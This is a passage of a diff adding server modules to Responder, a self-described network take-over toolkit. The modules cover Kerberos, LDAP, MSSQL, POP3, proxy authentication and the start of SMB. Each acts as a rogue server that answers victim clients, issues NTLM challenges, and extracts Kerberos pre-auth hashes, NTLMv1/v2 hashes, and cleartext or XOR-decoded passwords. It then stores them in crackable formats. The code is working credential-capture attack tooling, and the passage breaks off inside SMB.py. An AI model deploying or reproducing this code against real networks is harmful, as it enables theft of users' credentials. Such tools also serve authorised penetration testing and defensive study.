# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
from SocketServer import BaseRequestHandler
|
||||||
|
from utils import *
|
||||||
|
import struct
|
||||||
|
|
||||||
|
def ParseMSKerbv5TCP(Data):
|
||||||
|
MsgType = Data[21:22]
|
||||||
|
EncType = Data[43:44]
|
||||||
|
MessageType = Data[32:33]
|
||||||
|
|
||||||
|
if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02":
|
||||||
|
if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33":
|
||||||
|
HashLen = struct.unpack('<b',Data[50:51])[0]
|
||||||
|
if HashLen == 54:
|
||||||
|
Hash = Data[53:105]
|
||||||
|
SwitchHash = Hash[16:]+Hash[0:16]
|
||||||
|
NameLen = struct.unpack('<b',Data[153:154])[0]
|
||||||
|
Name = Data[154:154+NameLen]
|
||||||
|
DomainLen = struct.unpack('<b',Data[154+NameLen+3:154+NameLen+4])[0]
|
||||||
|
Domain = Data[154+NameLen+4:154+NameLen+4+DomainLen]
|
||||||
|
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||||
|
return BuildHash
|
||||||
|
|
||||||
|
if Data[44:48] == "\xa2\x36\x04\x34" or Data[44:48] == "\xa2\x35\x04\x33":
|
||||||
|
HashLen = struct.unpack('<b',Data[45:46])[0]
|
||||||
|
if HashLen == 53:
|
||||||
|
Hash = Data[48:99]
|
||||||
|
SwitchHash = Hash[16:]+Hash[0:16]
|
||||||
|
NameLen = struct.unpack('<b',Data[147:148])[0]
|
||||||
|
Name = Data[148:148+NameLen]
|
||||||
|
DomainLen = struct.unpack('<b',Data[148+NameLen+3:148+NameLen+4])[0]
|
||||||
|
Domain = Data[148+NameLen+4:148+NameLen+4+DomainLen]
|
||||||
|
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||||
|
return BuildHash
|
||||||
|
elif HashLen == 54:
|
||||||
|
Hash = Data[53:105]
|
||||||
|
SwitchHash = Hash[16:]+Hash[0:16]
|
||||||
|
NameLen = struct.unpack('<b',Data[148:149])[0]
|
||||||
|
Name = Data[149:149+NameLen]
|
||||||
|
DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
|
||||||
|
Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
|
||||||
|
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||||
|
return BuildHash
|
||||||
|
else:
|
||||||
|
Hash = Data[48:100]
|
||||||
|
SwitchHash = Hash[16:]+Hash[0:16]
|
||||||
|
NameLen = struct.unpack('<b',Data[148:149])[0]
|
||||||
|
Name = Data[149:149+NameLen]
|
||||||
|
DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
|
||||||
|
Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
|
||||||
|
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||||
|
return BuildHash
|
||||||
|
return False
|
||||||
|
|
||||||
|
def ParseMSKerbv5UDP(Data):
|
||||||
|
MsgType = Data[17:18]
|
||||||
|
EncType = Data[39:40]
|
||||||
|
|
||||||
|
if MsgType == "\x0a" and EncType == "\x17":
|
||||||
|
if Data[40:44] == "\xa2\x36\x04\x34" or Data[40:44] == "\xa2\x35\x04\x33":
|
||||||
|
HashLen = struct.unpack('<b',Data[41:42])[0]
|
||||||
|
if HashLen == 54:
|
||||||
|
Hash = Data[44:96]
|
||||||
|
SwitchHash = Hash[16:]+Hash[0:16]
|
||||||
|
NameLen = struct.unpack('<b',Data[144:145])[0]
|
||||||
|
Name = Data[145:145+NameLen]
|
||||||
|
DomainLen = struct.unpack('<b',Data[145+NameLen+3:145+NameLen+4])[0]
|
||||||
|
Domain = Data[145+NameLen+4:145+NameLen+4+DomainLen]
|
||||||
|
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||||
|
return BuildHash
|
||||||
|
elif HashLen == 53:
|
||||||
|
Hash = Data[44:95]
|
||||||
|
SwitchHash = Hash[16:]+Hash[0:16]
|
||||||
|
NameLen = struct.unpack('<b',Data[143:144])[0]
|
||||||
|
Name = Data[144:144+NameLen]
|
||||||
|
DomainLen = struct.unpack('<b',Data[144+NameLen+3:144+NameLen+4])[0]
|
||||||
|
Domain = Data[144+NameLen+4:144+NameLen+4+DomainLen]
|
||||||
|
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||||
|
return BuildHash
|
||||||
|
else:
|
||||||
|
Hash = Data[49:101]
|
||||||
|
SwitchHash = Hash[16:]+Hash[0:16]
|
||||||
|
NameLen = struct.unpack('<b',Data[149:150])[0]
|
||||||
|
Name = Data[150:150+NameLen]
|
||||||
|
DomainLen = struct.unpack('<b',Data[150+NameLen+3:150+NameLen+4])[0]
|
||||||
|
Domain = Data[150+NameLen+4:150+NameLen+4+DomainLen]
|
||||||
|
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||||
|
return BuildHash
|
||||||
|
return False
|
||||||
|
|
||||||
|
class KerbTCP(BaseRequestHandler):
|
||||||
|
def handle(self):
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
KerbHash = ParseMSKerbv5TCP(data)
|
||||||
|
|
||||||
|
if KerbHash:
|
||||||
|
n, krb, v, name, domain, d, h = KerbHash.split('$')
|
||||||
|
|
||||||
|
SaveToDb({
|
||||||
|
'module': 'KERB',
|
||||||
|
'type': 'MSKerbv5',
|
||||||
|
'client': self.client_address[0],
|
||||||
|
'user': domain+'\\'+name,
|
||||||
|
'hash': h,
|
||||||
|
'fullhash': KerbHash,
|
||||||
|
})
|
||||||
|
|
||||||
|
class KerbUDP(BaseRequestHandler):
|
||||||
|
|
||||||
|
def handle(self):
|
||||||
|
data, soc = self.request
|
||||||
|
KerbHash = ParseMSKerbv5UDP(data)
|
||||||
|
|
||||||
|
if KerbHash:
|
||||||
|
(n, krb, v, name, domain, d, h) = KerbHash.split('$')
|
||||||
|
|
||||||
|
SaveToDb({
|
||||||
|
'module': 'KERB',
|
||||||
|
'type': 'MSKerbv5',
|
||||||
|
'client': self.client_address[0],
|
||||||
|
'user': domain+'\\'+name,
|
||||||
|
'hash': h,
|
||||||
|
'fullhash': KerbHash,
|
||||||
|
})
|
||||||
119
servers/LDAP.py
Normal file
119
servers/LDAP.py
Normal file
@@ -0,0 +1,119 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# This file is part of Responder, a network take-over set of tools
|
||||||
|
# created and maintained by Laurent Gaffie.
|
||||||
|
# email: laurent.gaffie@gmail.com
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
from SocketServer import BaseRequestHandler
|
||||||
|
from packets import LDAPSearchDefaultPacket, LDAPSearchSupportedCapabilitiesPacket, LDAPSearchSupportedMechanismsPacket, LDAPNTLMChallenge
|
||||||
|
from utils import *
|
||||||
|
import struct
|
||||||
|
|
||||||
|
def ParseSearch(data):
|
||||||
|
if re.search(r'(objectClass)', data):
|
||||||
|
return str(LDAPSearchDefaultPacket(MessageIDASNStr=data[8:9]))
|
||||||
|
elif re.search(r'(?i)(objectClass0*.*supportedCapabilities)', data):
|
||||||
|
return str(LDAPSearchSupportedCapabilitiesPacket(MessageIDASNStr=data[8:9],MessageIDASN2Str=data[8:9]))
|
||||||
|
elif re.search(r'(?i)(objectClass0*.*supportedSASLMechanisms)', data):
|
||||||
|
return str(LDAPSearchSupportedMechanismsPacket(MessageIDASNStr=data[8:9],MessageIDASN2Str=data[8:9]))
|
||||||
|
|
||||||
|
def ParseLDAPHash(data, client):
|
||||||
|
SSPIStart = data[42:]
|
||||||
|
LMhashLen = struct.unpack('<H',data[54:56])[0]
|
||||||
|
|
||||||
|
if LMhashLen > 10:
|
||||||
|
LMhashOffset = struct.unpack('<H',data[58:60])[0]
|
||||||
|
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
|
||||||
|
|
||||||
|
NthashLen = struct.unpack('<H',data[64:66])[0]
|
||||||
|
NthashOffset = struct.unpack('<H',data[66:68])[0]
|
||||||
|
NtHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
|
||||||
|
|
||||||
|
DomainLen = struct.unpack('<H',data[72:74])[0]
|
||||||
|
DomainOffset = struct.unpack('<H',data[74:76])[0]
|
||||||
|
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
|
||||||
|
|
||||||
|
UserLen = struct.unpack('<H',data[80:82])[0]
|
||||||
|
UserOffset = struct.unpack('<H',data[82:84])[0]
|
||||||
|
User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
|
||||||
|
|
||||||
|
WriteHash = User + "::" + Domain + ":" + LMHash + ":" + NtHash + ":" + settings.Config.NumChal
|
||||||
|
|
||||||
|
SaveToDb({
|
||||||
|
'module': 'LDAP',
|
||||||
|
'type': 'NTLMv1',
|
||||||
|
'client': client,
|
||||||
|
'user': Domain+'\\'+User,
|
||||||
|
'hash': NtHash,
|
||||||
|
'fullhash': WriteHash,
|
||||||
|
})
|
||||||
|
|
||||||
|
if LMhashLen < 2 and settings.Config.Verbose:
|
||||||
|
print text("[LDAP] Ignoring anonymous NTLM authentication")
|
||||||
|
|
||||||
|
def ParseNTLM(data,client):
|
||||||
|
if re.search('(NTLMSSP\x00\x01\x00\x00\x00)', data):
|
||||||
|
NTLMChall = LDAPNTLMChallenge(MessageIDASNStr=data[8:9],NTLMSSPNtServerChallenge=settings.Config.Challenge)
|
||||||
|
NTLMChall.calculate()
|
||||||
|
return str(NTLMChall)
|
||||||
|
elif re.search('(NTLMSSP\x00\x03\x00\x00\x00)', data):
|
||||||
|
ParseLDAPHash(data,client)
|
||||||
|
|
||||||
|
def ParseLDAPPacket(data, client):
|
||||||
|
if data[1:2] == '\x84':
|
||||||
|
PacketLen = struct.unpack('>i',data[2:6])[0]
|
||||||
|
MessageSequence = struct.unpack('<b',data[8:9])[0]
|
||||||
|
Operation = data[9:10]
|
||||||
|
sasl = data[20:21]
|
||||||
|
OperationHeadLen = struct.unpack('>i',data[11:15])[0]
|
||||||
|
LDAPVersion = struct.unpack('<b',data[17:18])[0]
|
||||||
|
|
||||||
|
if Operation == "\x60":
|
||||||
|
UserDomainLen = struct.unpack('<b',data[19:20])[0]
|
||||||
|
UserDomain = data[20:20+UserDomainLen]
|
||||||
|
AuthHeaderType = data[20+UserDomainLen:20+UserDomainLen+1]
|
||||||
|
|
||||||
|
if AuthHeaderType == "\x80":
|
||||||
|
PassLen = struct.unpack('<b',data[20+UserDomainLen+1:20+UserDomainLen+2])[0]
|
||||||
|
Password = data[20+UserDomainLen+2:20+UserDomainLen+2+PassLen]
|
||||||
|
SaveToDb({
|
||||||
|
'module': 'LDAP',
|
||||||
|
'type': 'Cleartext',
|
||||||
|
'client': client,
|
||||||
|
'user': UserDomain,
|
||||||
|
'cleartext': Password,
|
||||||
|
'fullhash': UserDomain+':'+Password,
|
||||||
|
})
|
||||||
|
|
||||||
|
if sasl == "\xA3":
|
||||||
|
Buffer = ParseNTLM(data,client)
|
||||||
|
return Buffer
|
||||||
|
|
||||||
|
elif Operation == "\x63":
|
||||||
|
Buffer = ParseSearch(data)
|
||||||
|
return Buffer
|
||||||
|
elif settings.Config.Verbose:
|
||||||
|
print text('[LDAP] Operation not supported')
|
||||||
|
|
||||||
|
class LDAP(BaseRequestHandler):
|
||||||
|
def handle(self):
|
||||||
|
try:
|
||||||
|
while True:
|
||||||
|
self.request.settimeout(0.5)
|
||||||
|
data = self.request.recv(8092)
|
||||||
|
Buffer = ParseLDAPPacket(data,self.client_address[0])
|
||||||
|
|
||||||
|
if Buffer:
|
||||||
|
self.request.send(Buffer)
|
||||||
|
except socket.timeout:
|
||||||
|
pass
|
||||||
150
servers/MSSQL.py
Normal file
150
servers/MSSQL.py
Normal file
@@ -0,0 +1,150 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# This file is part of Responder, a network take-over set of tools
|
||||||
|
# created and maintained by Laurent Gaffie.
|
||||||
|
# email: laurent.gaffie@gmail.com
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
from SocketServer import BaseRequestHandler
|
||||||
|
from packets import MSSQLPreLoginAnswer, MSSQLNTLMChallengeAnswer
|
||||||
|
from utils import *
|
||||||
|
import struct
|
||||||
|
|
||||||
|
class TDS_Login_Packet:
|
||||||
|
def __init__(self, data):
|
||||||
|
|
||||||
|
ClientNameOff = struct.unpack('<h', data[44:46])[0]
|
||||||
|
ClientNameLen = struct.unpack('<h', data[46:48])[0]
|
||||||
|
UserNameOff = struct.unpack('<h', data[48:50])[0]
|
||||||
|
UserNameLen = struct.unpack('<h', data[50:52])[0]
|
||||||
|
PasswordOff = struct.unpack('<h', data[52:54])[0]
|
||||||
|
PasswordLen = struct.unpack('<h', data[54:56])[0]
|
||||||
|
AppNameOff = struct.unpack('<h', data[56:58])[0]
|
||||||
|
AppNameLen = struct.unpack('<h', data[58:60])[0]
|
||||||
|
ServerNameOff = struct.unpack('<h', data[60:62])[0]
|
||||||
|
ServerNameLen = struct.unpack('<h', data[62:64])[0]
|
||||||
|
Unknown1Off = struct.unpack('<h', data[64:66])[0]
|
||||||
|
Unknown1Len = struct.unpack('<h', data[66:68])[0]
|
||||||
|
LibraryNameOff = struct.unpack('<h', data[68:70])[0]
|
||||||
|
LibraryNameLen = struct.unpack('<h', data[70:72])[0]
|
||||||
|
LocaleOff = struct.unpack('<h', data[72:74])[0]
|
||||||
|
LocaleLen = struct.unpack('<h', data[74:76])[0]
|
||||||
|
DatabaseNameOff = struct.unpack('<h', data[76:78])[0]
|
||||||
|
DatabaseNameLen = struct.unpack('<h', data[78:80])[0]
|
||||||
|
|
||||||
|
self.ClientName = data[8+ClientNameOff:8+ClientNameOff+ClientNameLen*2].replace('\x00', '')
|
||||||
|
self.UserName = data[8+UserNameOff:8+UserNameOff+UserNameLen*2].replace('\x00', '')
|
||||||
|
self.Password = data[8+PasswordOff:8+PasswordOff+PasswordLen*2].replace('\x00', '')
|
||||||
|
self.AppName = data[8+AppNameOff:8+AppNameOff+AppNameLen*2].replace('\x00', '')
|
||||||
|
self.ServerName = data[8+ServerNameOff:8+ServerNameOff+ServerNameLen*2].replace('\x00', '')
|
||||||
|
self.Unknown1 = data[8+Unknown1Off:8+Unknown1Off+Unknown1Len*2].replace('\x00', '')
|
||||||
|
self.LibraryName = data[8+LibraryNameOff:8+LibraryNameOff+LibraryNameLen*2].replace('\x00', '')
|
||||||
|
self.Locale = data[8+LocaleOff:8+LocaleOff+LocaleLen*2].replace('\x00', '')
|
||||||
|
self.DatabaseName = data[8+DatabaseNameOff:8+DatabaseNameOff+DatabaseNameLen*2].replace('\x00', '')
|
||||||
|
|
||||||
|
|
||||||
|
def ParseSQLHash(data, client):
|
||||||
|
SSPIStart = data[8:]
|
||||||
|
|
||||||
|
LMhashLen = struct.unpack('<H',data[20:22])[0]
|
||||||
|
LMhashOffset = struct.unpack('<H',data[24:26])[0]
|
||||||
|
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
|
||||||
|
|
||||||
|
NthashLen = struct.unpack('<H',data[30:32])[0]
|
||||||
|
NthashOffset = struct.unpack('<H',data[32:34])[0]
|
||||||
|
NTHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
|
||||||
|
|
||||||
|
DomainLen = struct.unpack('<H',data[36:38])[0]
|
||||||
|
DomainOffset = struct.unpack('<H',data[40:42])[0]
|
||||||
|
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
|
||||||
|
|
||||||
|
UserLen = struct.unpack('<H',data[44:46])[0]
|
||||||
|
UserOffset = struct.unpack('<H',data[48:50])[0]
|
||||||
|
User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
|
||||||
|
|
||||||
|
if NthashLen == 24:
|
||||||
|
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, LMHash, NTHash, settings.Config.NumChal)
|
||||||
|
|
||||||
|
SaveToDb({
|
||||||
|
'module': 'MSSQL',
|
||||||
|
'type': 'NTLMv1',
|
||||||
|
'client': client,
|
||||||
|
'user': Domain+'\\'+User,
|
||||||
|
'hash': LMHash+":"+NTHash,
|
||||||
|
'fullhash': WriteHash,
|
||||||
|
})
|
||||||
|
|
||||||
|
if NthashLen > 60:
|
||||||
|
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, settings.Config.NumChal, NTHash[:32], NTHash[32:])
|
||||||
|
|
||||||
|
SaveToDb({
|
||||||
|
'module': 'MSSQL',
|
||||||
|
'type': 'NTLMv2',
|
||||||
|
'client': client,
|
||||||
|
'user': Domain+'\\'+User,
|
||||||
|
'hash': NTHash[:32]+":"+NTHash[32:],
|
||||||
|
'fullhash': WriteHash,
|
||||||
|
})
|
||||||
|
|
||||||
|
|
||||||
|
def ParseSqlClearTxtPwd(Pwd):
|
||||||
|
Pwd = map(ord,Pwd.replace('\xa5',''))
|
||||||
|
Pw = ''
|
||||||
|
for x in Pwd:
|
||||||
|
Pw += hex(x ^ 0xa5)[::-1][:2].replace("x", "0").decode('hex')
|
||||||
|
return Pw
|
||||||
|
|
||||||
|
|
||||||
|
def ParseClearTextSQLPass(data, client):
|
||||||
|
TDS = TDS_Login_Packet(data)
|
||||||
|
SaveToDb({
|
||||||
|
'module': 'MSSQL',
|
||||||
|
'type': 'Cleartext',
|
||||||
|
'client': client,
|
||||||
|
'hostname': "%s (%s)" % (TDS.ServerName, TDS.DatabaseName),
|
||||||
|
'user': TDS.UserName,
|
||||||
|
'cleartext': ParseSqlClearTxtPwd(TDS.Password),
|
||||||
|
'fullhash': TDS.UserName +':'+ ParseSqlClearTxtPwd(TDS.Password),
|
||||||
|
})
|
||||||
|
|
||||||
|
# MSSQL Server class
|
||||||
|
class MSSQL(BaseRequestHandler):
|
||||||
|
def handle(self):
|
||||||
|
if settings.Config.Verbose:
|
||||||
|
print text("[MSSQL] Received connection from %s" % self.client_address[0])
|
||||||
|
|
||||||
|
try:
|
||||||
|
while True:
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
self.request.settimeout(0.1)
|
||||||
|
|
||||||
|
|
||||||
|
if data[0] == "\x12": # Pre-Login Message
|
||||||
|
Buffer = str(MSSQLPreLoginAnswer())
|
||||||
|
self.request.send(Buffer)
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
|
||||||
|
if data[0] == "\x10": # NegoSSP
|
||||||
|
if re.search("NTLMSSP",data):
|
||||||
|
Packet = MSSQLNTLMChallengeAnswer(ServerChallenge=settings.Config.Challenge)
|
||||||
|
Packet.calculate()
|
||||||
|
Buffer = str(Packet)
|
||||||
|
self.request.send(Buffer)
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
else:
|
||||||
|
ParseClearTextSQLPass(data,self.client_address[0])
|
||||||
|
|
||||||
|
if data[0] == "\x11": # NegoSSP Auth
|
||||||
|
ParseSQLHash(data,self.client_address[0])
|
||||||
|
|
||||||
|
except socket.timeout:
|
||||||
|
self.request.close()
|
||||||
48
servers/POP3.py
Normal file
48
servers/POP3.py
Normal file
@@ -0,0 +1,48 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# This file is part of Responder, a network take-over set of tools
|
||||||
|
# created and maintained by Laurent Gaffie.
|
||||||
|
# email: laurent.gaffie@gmail.com
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
from utils import *
|
||||||
|
from SocketServer import BaseRequestHandler
|
||||||
|
from packets import POPOKPacket
|
||||||
|
|
||||||
|
# POP3 Server class
|
||||||
|
class POP3(BaseRequestHandler):
|
||||||
|
def SendPacketAndRead(self):
|
||||||
|
Packet = POPOKPacket()
|
||||||
|
self.request.send(str(Packet))
|
||||||
|
return self.request.recv(1024)
|
||||||
|
|
||||||
|
def handle(self):
|
||||||
|
try:
|
||||||
|
data = self.SendPacketAndRead()
|
||||||
|
|
||||||
|
if data[0:4] == "USER":
|
||||||
|
User = data[5:].replace("\r\n","")
|
||||||
|
data = self.SendPacketAndRead()
|
||||||
|
if data[0:4] == "PASS":
|
||||||
|
Pass = data[5:].replace("\r\n","")
|
||||||
|
|
||||||
|
SaveToDb({
|
||||||
|
'module': 'POP3',
|
||||||
|
'type': 'Cleartext',
|
||||||
|
'client': self.client_address[0],
|
||||||
|
'user': User,
|
||||||
|
'cleartext': Pass,
|
||||||
|
'fullhash': User+":"+Pass,
|
||||||
|
})
|
||||||
|
self.SendPacketAndRead()
|
||||||
|
except Exception:
|
||||||
|
pass
|
||||||
110
servers/Proxy_Auth.py
Normal file
110
servers/Proxy_Auth.py
Normal file
@@ -0,0 +1,110 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# This file is part of Responder, a network take-over set of tools
|
||||||
|
# created and maintained by Laurent Gaffie.
|
||||||
|
# email: laurent.gaffie@gmail.com
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
import SocketServer
|
||||||
|
from HTTP import ParseHTTPHash
|
||||||
|
from packets import *
|
||||||
|
from utils import *
|
||||||
|
|
||||||
|
def GrabUserAgent(data):
|
||||||
|
UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data)
|
||||||
|
print text("[Proxy-Auth] %s" % color("User-Agent : "+UserAgent[0], 2))
|
||||||
|
|
||||||
|
def GrabCookie(data):
|
||||||
|
Cookie = re.search(r'(Cookie:*.\=*)[^\r\n]*', data)
|
||||||
|
|
||||||
|
if Cookie:
|
||||||
|
Cookie = Cookie.group(0).replace('Cookie: ', '')
|
||||||
|
if len(Cookie) > 1:
|
||||||
|
if settings.Config.Verbose:
|
||||||
|
print text("[Proxy-Auth] %s" % color("Cookie : "+Cookie, 2))
|
||||||
|
|
||||||
|
return Cookie
|
||||||
|
return False
|
||||||
|
|
||||||
|
def GrabHost(data):
|
||||||
|
Host = re.search(r'(Host:*.\=*)[^\r\n]*', data)
|
||||||
|
|
||||||
|
if Host:
|
||||||
|
Host = Host.group(0).replace('Host: ', '')
|
||||||
|
if settings.Config.Verbose:
|
||||||
|
print text("[Proxy-Auth] %s" % color("Host : "+Host, 2))
|
||||||
|
|
||||||
|
return Host
|
||||||
|
return False
|
||||||
|
|
||||||
|
def PacketSequence(data, client):
|
||||||
|
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
|
||||||
|
Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)
|
||||||
|
if NTLM_Auth:
|
||||||
|
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
|
||||||
|
if Packet_NTLM == "\x01":
|
||||||
|
if settings.Config.Verbose:
|
||||||
|
print text("[Proxy-Auth] Sending NTLM authentication request to %s" % client)
|
||||||
|
|
||||||
|
Buffer = NTLM_Challenge(ServerChallenge=settings.Config.Challenge)
|
||||||
|
Buffer.calculate()
|
||||||
|
Buffer_Ans = WPAD_NTLM_Challenge_Ans()
|
||||||
|
Buffer_Ans.calculate(str(Buffer))
|
||||||
|
return str(Buffer_Ans)
|
||||||
|
if Packet_NTLM == "\x03":
|
||||||
|
NTLM_Auth = b64decode(''.join(NTLM_Auth))
|
||||||
|
ParseHTTPHash(NTLM_Auth, client, "Proxy-Auth")
|
||||||
|
GrabUserAgent(data)
|
||||||
|
GrabCookie(data)
|
||||||
|
GrabHost(data)
|
||||||
|
return False #Send a RST with SO_LINGER when close() is called (see Responder.py)
|
||||||
|
else:
|
||||||
|
return False
|
||||||
|
|
||||||
|
elif Basic_Auth:
|
||||||
|
GrabUserAgent(data)
|
||||||
|
GrabCookie(data)
|
||||||
|
GrabHost(data)
|
||||||
|
ClearText_Auth = b64decode(''.join(Basic_Auth))
|
||||||
|
SaveToDb({
|
||||||
|
'module': 'Proxy-Auth',
|
||||||
|
'type': 'Basic',
|
||||||
|
'client': client,
|
||||||
|
'user': ClearText_Auth.split(':')[0],
|
||||||
|
'cleartext': ClearText_Auth.split(':')[1],
|
||||||
|
})
|
||||||
|
|
||||||
|
return False
|
||||||
|
else:
|
||||||
|
if settings.Config.Basic:
|
||||||
|
Response = WPAD_Basic_407_Ans()
|
||||||
|
if settings.Config.Verbose:
|
||||||
|
print text("[Proxy-Auth] Sending BASIC authentication request to %s" % client)
|
||||||
|
|
||||||
|
else:
|
||||||
|
Response = WPAD_Auth_407_Ans()
|
||||||
|
|
||||||
|
return str(Response)
|
||||||
|
|
||||||
|
class Proxy_Auth(SocketServer.BaseRequestHandler):
|
||||||
|
|
||||||
|
|
||||||
|
def handle(self):
|
||||||
|
try:
|
||||||
|
for x in range(2):
|
||||||
|
data = self.request.recv(4096)
|
||||||
|
self.request.send(PacketSequence(data, self.client_address[0]))
|
||||||
|
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
|
|
||||||
444
servers/SMB.py
Normal file
444
servers/SMB.py
Normal file
@@ -0,0 +1,444 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# This file is part of Responder, a network take-over set of tools
|
||||||
|
# created and maintained by Laurent Gaffie.
|
||||||
|
# email: laurent.gaffie@gmail.com
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
from random import randrange
|
||||||
|
from packets import SMBHeader, SMBNegoAnsLM, SMBNegoKerbAns, SMBSession1Data, SMBSession2Accept, SMBSessEmpty, SMBTreeData, SMB2Header, SMB2NegoAns, SMB2Session1Data, SMB2Session2Data
|
||||||
|
from SocketServer import BaseRequestHandler
|
||||||
|
from utils import *
|
||||||
|
import struct
|
||||||
|
import re
|
||||||
|
|
||||||
|
|
||||||
|
def Is_Anonymous(data): # Detect if SMB auth was Anonymous
|
||||||
|
SecBlobLen = struct.unpack('<H',data[51:53])[0]
|
||||||
|
|
||||||
|
if SecBlobLen < 260:
|
||||||
|
LMhashLen = struct.unpack('<H',data[89:91])[0]
|
||||||
|
return LMhashLen in [0, 1]
|
||||||
|
elif SecBlobLen > 260:
|
||||||
|
LMhashLen = struct.unpack('<H',data[93:95])[0]
|
||||||
|
return LMhashLen in [0, 1]
|
||||||
|
|
||||||
|
def Is_LMNT_Anonymous(data):
|
||||||
|
